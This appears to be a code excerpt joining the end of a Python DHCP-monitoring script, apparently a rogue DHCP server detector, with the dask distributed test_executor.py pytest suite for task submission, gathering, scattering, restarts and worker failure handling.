sys.exit(1)
ifaces = config.sections()
if len(ifaces) == 0:
logger.critical(
"Fail to check the configuration file in " + config_file
)
sys.exit(2)
for iface in ifaces:
logger.info(iface + ": FOUND IN " + config_file)
try:
timeout = int(config[iface]["discover_timeout"])
logger.info("Stablished timeout = %s seconds" % timeout)
except KeyError:
timeout = 10
logger.info(
"Stablished timeout = 10 for sending DHCP DISCOVER packets as DEFAULT"
)
whitelist = (
[]
if "whitelist" not in config[iface]
else [ip.strip() for ip in config[iface]["whitelist"].split(",")]
)
fail_objects = (
[]
if "fail_test" not in config[iface]
else get_control_objects(config[iface], "fail_test")
)
pass_objects = (
[]
if "pass_test" not in config[iface]
else get_control_objects(config[iface], "pass_test")
)
final_objects = (
[]
if "final_exec" not in config[iface]
else get_control_objects(config[iface], "final_exec")
)
watchmen = DHCPWatchmen(
iface, fail_objects, pass_objects, final_objects, whitelist
)
Thread(target=watchmen.sniff_dhcp).start()
Thread(target=watchmen.dhcp_discovery_daemon, args=(timeout,)).start()
|
test_executor.py
|
from __future__ import print_function, division, absolute_import
from operator import add
from collections import Iterator
from concurrent.futures import CancelledError
import itertools
from multiprocessing import Process
import sys
from threading import Thread
from time import sleep, time
import traceback
import mock
import pytest
from toolz import (identity, isdistinct, first, concat, pluck, valmap,
partition_all)
from tornado import gen
from tornado.ioloop import IOLoop
from dask import delayed
from dask.context import _globals
from distributed import Worker, Nanny
from distributed.client import WrappedKey
from distributed.executor import (Executor, Future, CompatibleExecutor, _wait,
wait, _as_completed, as_completed, tokenize, _global_executor,
default_executor, _first_completed, ensure_default_get, futures_of)
from distributed.scheduler import Scheduler, KilledWorker
from distributed.sizeof import sizeof
from distributed.utils import sync, tmp_text, ignoring
from distributed.utils_test import (cluster, slow, slowinc, slowadd, randominc,
_test_scheduler, loop, inc, dec, div, throws,
gen_cluster, gen_test, double, deep)
@gen_cluster(executor=True)
def test_submit(e, s, a, b):
x = e.submit(inc, 10)
assert not x.done()
assert isinstance(x, Future)
assert x.executor is e
result = yield x._result()
assert result == 11
assert x.done()
y = e.submit(inc, 20)
z = e.submit(add, x, y)
result = yield z._result()
assert result == 11 + 21
@gen_cluster(executor=True)
def test_map(e, s, a, b):
L1 = e.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = yield L1[0]._result()
assert result == inc(0)
assert len(s.tasks) == 5
L2 = e.map(inc, L1)
result = yield L2[1]._result()
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = e.submit(sum, L2)
result = yield total._result()
assert result == sum(map(inc, map(inc, range(5))))
L3 = e.map(add, L1, L2)
result = yield L3[1]._result()
assert result == inc(1) + inc(inc(1))
L4 = e.map(add, range(3), range(4))
results = yield e._gather(L4)
if sys.version_info[0] >= 3:
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = e.map(f, range(5), y=5)
results = yield e._gather(L5)
assert results == list(range(5, 10))
y = e.submit(f, 10)
L6 = e.map(f, range(5), y=y)
results = yield e._gather(L6)
assert results == list(range(20, 25))
@gen_cluster()
def test_compatible_map(s, a, b):
e = CompatibleExecutor((s.ip, s.port), start=False)
yield e._start()
results = e.map(inc, range(5))
assert not isinstance(results, list)
# Since this map blocks as it waits for results,
# waiting here will block the current IOLoop,
# which happens to also be running the test Workers.
# So wait on the results in a background thread to avoid blocking.
f = gen.Future()
def wait_on_results():
f.set_result(list(results))
t = Thread(target=wait_on_results)
t.daemon = True
t.start()
result_list = yield f
# getting map results blocks
assert result_list == list(map(inc, range(5)))
yield e._shutdown()
@gen_cluster(executor=True)
def test_future(e, s, a, b):
x = e.submit(inc, 10)
assert str(x.key) in repr(x)
assert str(x.status) in repr(x)
@gen_cluster(executor=True)
def test_Future_exception(e, s, a, b):
x = e.submit(div, 1, 0)
result = yield x._exception()
assert isinstance(result, ZeroDivisionError)
x = e.submit(div, 1, 1)
result = yield x._exception()
assert result is None
def test_Future_exception_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = e.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(executor=True)
def test_map_naming(e, s, a, b):
L1 = e.map(inc, range(5))
L2 = e.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = e.map(inc, [1, 1, 1, 1])
assert len({x.event for x in L3}) == 1
L4 = e.map(inc, [1, 1, 1, 1], pure=False)
assert len({x.event for x in L4}) == 4
@gen_cluster(executor=True)
def test_submit_naming(e, s, a, b):
a = e.submit(inc, 1)
b = e.submit(inc, 1)
assert a.event is b.event
c = e.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(executor=True)
def test_exceptions(e, s, a, b):
x = e.submit(div, 1, 2)
result = yield x._result()
assert result == 1 / 2
x = e.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
result = yield x._result()
x = e.submit(div, 10, 2) # continues to operate
result = yield x._result()
assert result == 10 / 2
@gen_cluster()
def test_gc(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
x = e.submit(inc, 10)
yield x._result()
assert s.who_has[x.key]
x.__del__()
yield e._shutdown()
assert not s.who_has[x.key]
def test_thread(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
assert x.result() == 2
def test_sync_exceptions(loop):
with cluster() as (s, [a, b]):
e = Executor(('127.0.0.1', s['port']), loop=loop)
x = e.submit(div, 10, 2)
assert x.result() == 5
y = e.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = e.submit(div, 10, 5)
assert z.result() == 2
e.shutdown()
@gen_cluster(executor=True)
def test_stress_1(e, s, a, b):
n = 2**6
seq = e.map(inc, range(n))
while len(seq) > 1:
yield gen.sleep(0.1)
seq = [e.submit(add, seq[i], seq[i + 1])
for i in range(0, len(seq), 2)]
result = yield seq[0]._result()
assert result == sum(map(inc, range(n)))
@gen_cluster(executor=True)
def test_gather(e, s, a, b):
x = e.submit(inc, 10)
y = e.submit(inc, x)
result = yield e._gather(x)
assert result == 11
result = yield e._gather([x])
assert result == [11]
result = yield e._gather({'x': x, 'y': [y]})
assert result == {'x': 11, 'y': [12]}
def test_gather_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
assert e.gather(x) == 2
y = e.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
e.gather([x, y])
[xx] = e.gather([x, y], errors='skip')
assert xx == 2
@gen_cluster(executor=True)
def test_gather_strict(e, s, a, b):
x = e.submit(div, 2, 1)
y = e.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
yield e._gather([x, y])
[xx] = yield e._gather([x, y], errors='skip')
assert xx == 2
@gen_cluster(executor=True)
def test_get(e, s, a, b):
result = yield e._get({'x': (inc, 1)}, 'x')
assert result == 2
result = yield e._get({'x': (inc, 1)}, ['x'])
assert result == [2]
result = yield e._get({}, [])
assert result == []
result = yield e._get({('x', 1): (inc, 1), ('x', 2): (inc, ('x', 1))},
('x', 2))
assert result == 3
def test_get_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
assert e.get({'x': (inc, 1)}, 'x') == 2
def test_get_sync_optimize_grpah_passes_through(loop):
import dask.bag as db
import dask
bag = db.range(10, npartitions=3).map(inc)
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
dask.compute(bag.sum(), optimize_graph=False, get=e.get)
def test_submit_errors(loop):
def f(a, b, c):
pass
e = Executor('127.0.0.1:8787', start=False, loop=loop)
with pytest.raises(TypeError):
e.submit(1, 2, 3)
with pytest.raises(TypeError):
e.map([1, 2, 3])
@gen_cluster(executor=True)
def test_wait(e, s, a, b):
a = e.submit(inc, 1)
b = e.submit(inc, 1)
c = e.submit(inc, 2)
done, not_done = yield _wait([a, b, c])
assert done == {a, b, c}
assert not_done == set()
assert a.status == b.status == 'finished'
@gen_cluster(executor=True)
def test__as_completed(e, s, a, b):
a = e.submit(inc, 1)
b = e.submit(inc, 1)
c = e.submit(inc, 2)
from distributed.compatibility import Queue
queue = Queue()
yield _as_completed([a, b, c], queue)
assert queue.qsize() == 3
assert {queue.get(), queue.get(), queue.get()} == {a, b, c}
result = yield _first_completed([a, b, c])
assert result in [a, b, c]
def test_as_completed(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(inc, 1)
seq = as_completed([x, y, z])
assert isinstance(seq, Iterator)
assert set(seq) == {x, y, z}
def test_wait_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
y = e.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == 'finished'
@gen_cluster(executor=True)
def test_garbage_collection(e, s, a, b):
a = e.submit(inc, 1)
b = e.submit(inc, 1)
assert e.refcount[a.key] == 2
a.__del__()
assert e.refcount[a.key] == 1
c = e.submit(inc, b)
b.__del__()
result = yield c._result()
assert result == 3
bkey = b.key
b.__del__()
assert bkey not in e.futures
@gen_cluster(executor=True)
def test_garbage_collection_with_scatter(e, s, a, b):
[a] = yield e._scatter([1])
assert a.key in e.futures
assert a.status == 'finished'
assert a.event.is_set()
assert s.who_wants[a.key] == {e.id}
assert e.refcount[a.key] == 1
a.__del__()
assert e.refcount[a.key] == 0
start = time()
while True:
if a.key not in s.who_has:
break
else:
assert time() < start + 3
yield gen.sleep(0.1)
@gen_cluster(timeout=1000, executor=True)
def test_recompute_released_key(e, s, a, b):
x = e.submit(inc, 100)
result1 = yield x._result()
xkey = x.key
del x
import gc; gc.collect()
assert e.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.who_has or xkey in a.data or xkey in b.data:
yield gen.sleep(0.1)
x = e.submit(inc, 100)
assert x.key in e.futures
result2 = yield x._result()
assert result1 == result2
@pytest.mark.parametrize(('func', 'n'), [(slowinc, 100), (inc, 1000)])
def test_stress_gc(loop, func, n):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(func, 1)
for i in range(n):
x = e.submit(func, x)
assert x.result() == n + 2
@slow
@gen_cluster(executor=True)
def test_long_tasks_dont_trigger_timeout(e, s, a, b):
from time import sleep
x = e.submit(sleep, 3)
yield x._result()
@gen_cluster(executor=True)
def test_missing_data_heals(e, s, a, b):
x = e.submit(inc, 1)
y = e.submit(inc, x)
z = e.submit(inc, y)
yield _wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
if y.key in b.data:
del b.data[y.key]
w = e.submit(add, y, z)
result = yield w._result()
assert result == 3 + 4
@slow
@gen_cluster()
def test_missing_worker(s, a, b):
bad = 'bad-host:8788'
s.ncores[bad] = 4
s.who_has['b'] = {bad}
s.has_what[bad] = {'b'}
e = Executor((s.ip, s.port), start=False)
yield e._start()
dsk = {'a': 1, 'b': (inc, 'a'), 'c': (inc, 'b')}
result = yield e._get(dsk, 'c')
assert result == 3
assert bad not in s.ncores
yield e._shutdown()
@gen_cluster(executor=True)
def test_gather_robust_to_missing_data(e, s, a, b):
x, y, z = e.map(inc, range(3))
yield _wait([x, y, z]) # everything computed
for q in [x, y]:
if q.key in a.data:
del a.data[q.key]
if q.key in b.data:
del b.data[q.key]
xx, yy, zz = yield e._gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(executor=True)
def test_gather_robust_to_nested_missing_data(e, s, a, b):
w = e.submit(inc, 1)
x = e.submit(inc, w)
y = e.submit(inc, x)
z = e.submit(inc, y)
yield _wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
result = yield e._gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(executor=True)
def test_tokenize_on_futures(e, s, a, b):
x = e.submit(inc, 1)
y = e.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
e.futures[x.key]['status'] = 'finished'
assert tok == tokenize(y)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_restrictions_submit(e, s, a, b):
x = e.submit(inc, 1, workers={a.ip})
y = e.submit(inc, x, workers={b.ip})
yield _wait([x, y])
assert s.restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(executor=True)
def test_restrictions_ip_port(e, s, a, b):
x = e.submit(inc, 1, workers={a.address})
y = e.submit(inc, x, workers={b.address})
yield _wait([x, y])
assert s.restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_restrictions_map(e, s, a, b):
L = e.map(inc, range(5), workers={a.ip})
yield _wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.restrictions[x.key] == {a.ip}
L = e.map(inc, [10, 11, 12], workers=[{a.ip},
{a.ip, b.ip},
{b.ip}])
yield _wait(L)
assert s.restrictions[L[0].key] == {a.ip}
assert s.restrictions[L[1].key] == {a.ip, b.ip}
assert s.restrictions[L[2].key] == {b.ip}
with pytest.raises(ValueError):
e.map(inc, [10, 11, 12], workers=[{a.ip}])
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_restrictions_get(e, s, a, b):
dsk = {'x': 1, 'y': (inc, 'x'), 'z': (inc, 'y')}
restrictions = {'y': {a.ip}, 'z': {b.ip}}
result = yield e._get(dsk, ['y', 'z'], restrictions)
assert result == [2, 3]
assert 'y' in a.data
assert 'z' in b.data
@gen_cluster(executor=True)
def dont_test_bad_restrictions_raise_exception(e, s, a, b):
z = e.submit(inc, 2, workers={'bad-address'})
try:
yield z._result()
assert False
except ValueError as e:
assert 'bad-address' in str(e)
assert z.key in str(e)
def test_submit_after_failed_worker(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
L = e.map(inc, range(10))
wait(L)
a['proc'].terminate()
total = e.submit(sum, L)
assert total.result() == sum(map(inc, range(10)))
def test_gather_after_failed_worker(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
L = e.map(inc, range(10))
wait(L)
a['proc'].terminate()
result = e.gather(L)
assert result == list(map(inc, range(10)))
@slow
def test_gather_then_submit_after_failed_workers(loop):
with cluster(nworkers=4) as (s, [w, x, y, z]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
L = e.map(inc, range(20))
wait(L)
w['proc'].terminate()
total = e.submit(sum, L)
wait([total])
(_, port) = first(e.scheduler.who_has[total.key])
for d in [x, y, z]:
if d['port'] == port:
d['proc'].terminate()
result = e.gather([total])
assert result == [sum(map(inc, range(20)))]
@gen_cluster(ncores=[('127.0.0.1', 1)], executor=True)
def test_errors_dont_block(e, s, w):
L = [e.submit(inc, 1),
e.submit(throws, 1),
e.submit(inc, 2),
e.submit(throws, 2)]
start = time()
while not (L[0].status == L[2].status == 'finished'):
assert time() < start + 5
yield gen.sleep(0.01)
result = yield e._gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(executor=True)
def test_submit_quotes(e, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = e.submit(assert_list, [1, 2, 3])
result = yield x._result()
assert result
x = e.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = yield x._result()
assert result
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(assert_list, [x, y])
result = yield z._result()
assert result
@gen_cluster(executor=True)
def test_map_quotes(e, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = e.map(assert_list, [[1, 2, 3], [4]])
result = yield e._gather(L)
assert all(result)
L = e.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = yield e._gather(L)
assert all(result)
L = e.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = yield e._gather(L)
assert all(result)
@gen_cluster()
def test_two_consecutive_executors_share_results(s, a, b):
from random import randint
e = Executor((s.ip, s.port), start=False)
yield e._start()
x = e.submit(randint, 0, 1000, pure=True)
xx = yield x._result()
f = Executor((s.ip, s.port), start=False)
yield f._start()
y = f.submit(randint, 0, 1000, pure=True)
yy = yield y._result()
assert xx == yy
yield e._shutdown()
yield f._shutdown()
@gen_cluster(executor=True)
def test_submit_then_get_with_Future(e, s, a, b):
x = e.submit(slowinc, 1)
dsk = {'y': (inc, x)}
result = yield e._get(dsk, 'y')
assert result == 3
@gen_cluster(executor=True)
def test_aliases(e, s, a, b):
x = e.submit(inc, 1)
dsk = {'y': x}
result = yield e._get(dsk, 'y')
assert result == 2
@gen_cluster(executor=True)
def test__scatter(e, s, a, b):
d = yield e._scatter({'y': 20})
assert isinstance(d['y'], Future)
assert a.data.get('y') == 20 or b.data.get('y') == 20
assert (a.address in s.who_has['y'] or
b.address in s.who_has['y'])
assert s.who_has['y']
assert s.nbytes == {'y': sizeof(20)}
yy = yield e._gather([d['y']])
assert yy == [20]
[x] = yield e._scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = yield e._gather([x])
assert s.who_has[x.key]
assert (a.address in s.who_has[x.key] or
b.address in s.who_has[x.key])
assert s.nbytes == {'y': sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = e.submit(add, x, d['y']) # submit works on Future
result = yield z._result()
assert result == 10 + 20
result = yield e._gather([z, x])
assert result == [30, 10]
@gen_cluster(executor=True)
def test__scatter_types(e, s, a, b):
d = yield e._scatter({'x': 1})
assert isinstance(d, dict)
assert list(d) == ['x']
for seq in [[1], (1,), {1}, frozenset([1])]:
L = yield e._scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
seq = yield e._scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
@gen_cluster(executor=True)
def test_scatter_hash(e, s, a, b):
[a] = yield e._scatter([1])
[b] = yield e._scatter([1])
assert a.key == b.key
@gen_cluster(executor=True)
def test_get_releases_data(e, s, a, b):
[x] = yield e._get({'x': (inc, 1)}, ['x'])
import gc; gc.collect()
assert e.refcount['x'] == 0
def test_global_executors(loop):
assert not _global_executor[0]
with pytest.raises(ValueError):
default_executor()
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
assert _global_executor == [e]
assert default_executor() is e
with Executor(('127.0.0.1', s['port']), loop=loop) as f:
assert _global_executor == [f]
assert default_executor() is f
assert default_executor(e) is e
assert default_executor(f) is f
assert not _global_executor[0]
@gen_cluster(executor=True)
def test_exception_on_exception(e, s, a, b):
x = e.submit(lambda: 1 / 0)
y = e.submit(inc, x)
with pytest.raises(ZeroDivisionError):
yield y._result()
z = e.submit(inc, y)
with pytest.raises(ZeroDivisionError):
yield z._result()
@gen_cluster(executor=True)
def test_nbytes(e, s, a, b):
[x] = yield e._scatter([1])
assert s.nbytes == {x.key: sizeof(1)}
y = e.submit(inc, x)
yield y._result()
assert s.nbytes == {x.key: sizeof(1),
y.key: sizeof(2)}
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_nbytes_determines_worker(e, s, a, b):
x = e.submit(identity, 1, workers=[a.ip])
y = e.submit(identity, tuple(range(100)), workers=[b.ip])
yield e._gather([x, y])
z = e.submit(lambda x, y: None, x, y)
yield z._result()
assert s.who_has[z.key] == {b.address}
@gen_cluster(executor=True)
def test_if_intermediates_clear_on_error(e, s, a, b):
x = delayed(div)(1, 0)
y = delayed(div)(1, 2)
z = delayed(add)(x, y)
f = e.compute(z)
with pytest.raises(ZeroDivisionError):
yield f._result()
s.validate()
assert not s.who_has
@gen_cluster(executor=True)
def test_pragmatic_move_small_data_to_large_data(e, s, a, b):
lists = e.map(lambda n: list(range(n)), [10] * 10, pure=False)
sums = e.map(sum, lists)
total = e.submit(sum, sums)
def f(x, y):
return None
results = e.map(f, lists, [total] * 10)
yield _wait([total])
yield _wait(results)
assert sum(s.who_has[l.key] == s.who_has[r.key]
for l, r in zip(lists, results)) >= 8
@gen_cluster(executor=True)
def test_get_with_non_list_key(e, s, a, b):
dsk = {('x', 0): (inc, 1), 5: (inc, 2)}
x = yield e._get(dsk, ('x', 0))
y = yield e._get(dsk, 5)
assert x == 2
assert y == 3
@gen_cluster(executor=True)
def test_get_with_error(e, s, a, b):
dsk = {'x': (div, 1, 0), 'y': (inc, 'x')}
with pytest.raises(ZeroDivisionError):
yield e._get(dsk, 'y')
def test_get_with_error_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
dsk = {'x': (div, 1, 0), 'y': (inc, 'x')}
with pytest.raises(ZeroDivisionError):
e.get(dsk, 'y')
@gen_cluster(executor=True)
def test_directed_scatter(e, s, a, b):
yield e._scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
yield e._scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
futures = e.scatter([1, 2, 3], workers=[('127.0.0.1', b['port'])])
has_what = sync(loop, e.scheduler.has_what)
assert len(has_what['127.0.0.1:%d' % b['port']]) == len(futures)
assert len(has_what['127.0.0.1:%d' % a['port']]) == 0
def test_iterator_scatter(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
aa = e.scatter([1,2,3])
assert [1,2,3] == e.gather(aa)
g = (i for i in range(10))
futures = e.scatter(g)
assert isinstance(futures, Iterator)
a = next(futures)
assert e.gather(a) == 0
futures = list(futures)
assert len(futures) == 9
assert e.gather(futures) == [1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_queue_scatter(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as ee:
from distributed.compatibility import Queue
q = Queue()
for d in range(10):
q.put(d)
futures = ee.scatter(q)
assert isinstance(futures, Queue)
a = futures.get()
assert ee.gather(a) == 0
def test_queue_scatter_gather_maxsize(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
from distributed.compatibility import Queue
q = Queue(maxsize=3)
out = e.scatter(q, maxsize=10)
assert out.maxsize == 10
local = e.gather(q)
assert not local.maxsize
q = Queue()
out = e.scatter(q)
assert not out.maxsize
local = e.gather(out, maxsize=10)
assert local.maxsize == 10
q = Queue(maxsize=3)
out = e.scatter(q)
assert not out.maxsize
def test_queue_gather(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as ee:
from distributed.compatibility import Queue
q = Queue()
qin = list(range(10))
for d in qin:
q.put(d)
futures = ee.scatter(q)
assert isinstance(futures, Queue)
ff = ee.gather(futures)
assert isinstance(ff, Queue)
qout = []
for f in range(10):
qout.append(ff.get())
assert qout == qin
def test_iterator_gather(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as ee:
i_in = list(range(10))
g = (d for d in i_in)
futures = ee.scatter(g)
assert isinstance(futures, Iterator)
ff = ee.gather(futures)
assert isinstance(ff, Iterator)
i_out = list(ff)
assert i_out == i_in
i_in = ['a', 'b', 'c', StopIteration('f'), StopIteration, 'd', 'e']
g = (d for d in i_in)
futures = ee.scatter(g)
ff = ee.gather(futures)
i_out = list(ff)
assert i_out[:3] == i_in[:3]
# This is because StopIteration('f') != StopIteration('f')
assert isinstance(i_out[3], StopIteration)
assert i_out[3].args == i_in[3].args
assert i_out[4:] == i_in[4:]
@gen_cluster(executor=True)
def test_many_submits_spread_evenly(e, s, a, b):
L = [e.submit(inc, i) for i in range(10)]
yield _wait(L)
assert a.data and b.data
@gen_cluster(executor=True)
def test_traceback(e, s, a, b):
x = e.submit(div, 1, 0)
tb = yield x._traceback()
if sys.version_info[0] >= 3:
assert any('x / y' in line
for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(executor=True)
def test_get_traceback(e, s, a, b):
try:
yield e._get({'x': (div, 1, 0)}, 'x')
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any('x / y' in line for line in L)
@gen_cluster(executor=True)
def test_gather_traceback(e, s, a, b):
x = e.submit(div, 1, 0)
try:
yield e._gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any('x / y' in line for line in L)
def test_traceback_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(div, 1, 0)
tb = x.traceback()
if sys.version_info[0] >= 3:
assert any('x / y' in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str))
y = e.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb))))
z = e.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(Worker=Nanny, executor=True)
def test_restart(e, s, a, b):
assert s.ncores == {a.worker_address: 1, b.worker_address: 2}
x = e.submit(inc, 1)
y = e.submit(inc, x)
z = e.submit(div, 1, 0)
yield y._result()
assert set(s.who_has) == {x.key, y.key}
f = yield e._restart()
assert f is e
assert len(s.stacks) == 2
assert len(s.processing) == 2
assert not s.who_has
assert x.cancelled()
assert y.cancelled()
assert z.cancelled()
assert z.key not in s.exceptions
assert not s.who_wants
assert not s.wants_what
@gen_cluster(Worker=Nanny, executor=True)
def test_restart_cleared(e, s, a, b):
x = 2 * delayed(1) + 1
f = e.compute(x)
yield _wait([f])
assert s.released
yield e._restart()
for coll in [s.tasks, s.dependencies, s.dependents, s.waiting,
s.waiting_data, s.who_has, s.restrictions, s.loose_restrictions,
s.released, s.keyorder, s.exceptions, s.who_wants,
s.exceptions_blame]:
assert not coll
def test_restart_sync_no_center(loop):
with cluster(nanny=True) as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
e.restart()
assert x.cancelled()
y = e.submit(inc, 2)
assert y.result() == 3
assert len(e.ncores()) == 2
def test_restart_sync(loop):
with cluster(nanny=True) as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(div, 1, 2)
x.result()
assert sync(loop, e.scheduler.who_has)
e.restart()
assert not sync(loop, e.scheduler.who_has)
assert x.cancelled()
assert len(e.ncores()) == 2
with pytest.raises(CancelledError):
x.result()
y = e.submit(div, 1, 3)
assert y.result() == 1 / 3
def test_restart_fast(loop):
with cluster(nanny=True) as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
L = e.map(sleep, range(10))
start = time()
e.restart()
assert time() - start < 5
assert len(e.ncores()) == 2
assert all(x.status == 'cancelled' for x in L)
x = e.submit(inc, 1)
assert x.result() == 2
@gen_cluster(Worker=Nanny, executor=True)
def test_fast_kill(e, s, a, b):
L = e.map(sleep, range(10))
start = time()
yield e._restart()
assert time() - start < 5
assert all(x.status == 'cancelled' for x in L)
x = e.submit(inc, 1)
result = yield x._result()
assert result == 2
@gen_cluster(executor=True)
def test_upload_file(e, s, a, b):
def g():
import myfile
return myfile.f()
with tmp_text('myfile.py', 'def f():\n return 123') as fn:
yield e._upload_file(fn)
sleep(1) # TODO: why is this necessary?
x = e.submit(g, pure=False)
result = yield x._result()
assert result == 123
with tmp_text('myfile.py', 'def f():\n return 456') as fn:
yield e._upload_file(fn)
y = e.submit(g, pure=False)
result = yield y._result()
assert result == 456
def test_upload_file_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
def g():
import myfile
return myfile.x
with tmp_text('myfile.py', 'x = 123') as fn:
e.upload_file(fn)
x = e.submit(g)
assert x.result() == 123
@gen_cluster(executor=True)
def test_upload_file_exception(e, s, a, b):
with tmp_text('myfile.py', 'syntax-error!') as fn:
with pytest.raises(SyntaxError):
yield e._upload_file(fn)
def test_upload_file_exception_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
with tmp_text('myfile.py', 'syntax-error!') as fn:
with pytest.raises(SyntaxError):
e.upload_file(fn)
@pytest.mark.xfail
@gen_cluster()
def test_multiple_executors(s, a, b):
a = Executor((s.ip, s.port), start=False)
yield a._start()
b = Executor((s.ip, s.port), start=False)
yield b._start()
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.executor is a
assert y.executor is b
xx = yield x._result()
yy = yield y._result()
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.executor is a
zz = yield z._result()
assert zz == 5
yield a._shutdown()
yield b._shutdown()
@gen_cluster(Worker=Nanny)
def test_multiple_executors_restart(s, a, b):
e1 = Executor((s.ip, s.port), start=False)
yield e1._start()
e2 = Executor((s.ip, s.port), start=False)
yield e2._start()
